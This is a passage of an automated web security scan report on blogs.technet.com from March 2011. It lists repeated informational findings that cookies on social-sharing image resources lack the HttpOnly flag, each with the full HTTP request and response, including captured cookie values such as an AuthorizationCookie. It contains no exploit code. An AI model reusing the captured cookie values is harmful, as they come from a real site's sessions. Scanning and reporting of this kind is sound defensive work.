GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.78. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/google.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/google.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/google.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "f408ac962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a28+GMT; expires=Sun, 25-Mar-2012 01:35:28 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:54 GMT
Content-Length: 944

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.79. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/less.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/less.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/less.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "29e18fc962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a28+GMT; expires=Sun, 25-Mar-2012 01:35:28 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:56 GMT
Content-Length: 943

GIF89a!.........___333...NNM...[[[iih...DDD.............................................................................................................................................................
...[SNIP]...
15.80. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "b2f48fc962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a22+GMT; expires=Sun, 25-Mar-2012 01:35:22 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 919

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.81. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "8db92c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 1005

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.82. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "de859fc962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a27+GMT; expires=Sun, 25-Mar-2012 01:35:27 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:53 GMT
Content-Length: 890

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.83. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/more.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/more.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/more.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "d6cba3c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a28+GMT; expires=Sun, 25-Mar-2012 01:35:28 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:54 GMT
Content-Length: 945

GIF89a!.........___333...NNM.........DDDvvu...@@@......[[[..............................................................................................................................................
...[SNIP]...
15.84. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "6d29a6c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 885

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.85. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "dfa3adc962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Tue%2c+22+Mar+2011+04%3a28%3a14+GMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a28+GMT; expires=Sun, 25-Mar-2012 01:35:28 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:53 GMT
Content-Length: 869

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.86. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "29f3b6c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a22+GMT; expires=Sun, 25-Mar-2012 01:35:22 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 963

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.87. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "347ec9c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 861

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.88. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "5ca9c7c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a27+GMT; expires=Sun, 25-Mar-2012 01:35:27 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:54 GMT
Content-Length: 973

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.89. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "1ffc6c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a27+GMT; expires=Sun, 25-Mar-2012 01:35:27 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:52 GMT
Content-Length: 930

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.90. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:01 GMT
Accept-Ranges: bytes
ETag: "73cbd3c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a21+GMT; expires=Sun, 25-Mar-2012 01:35:21 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 892

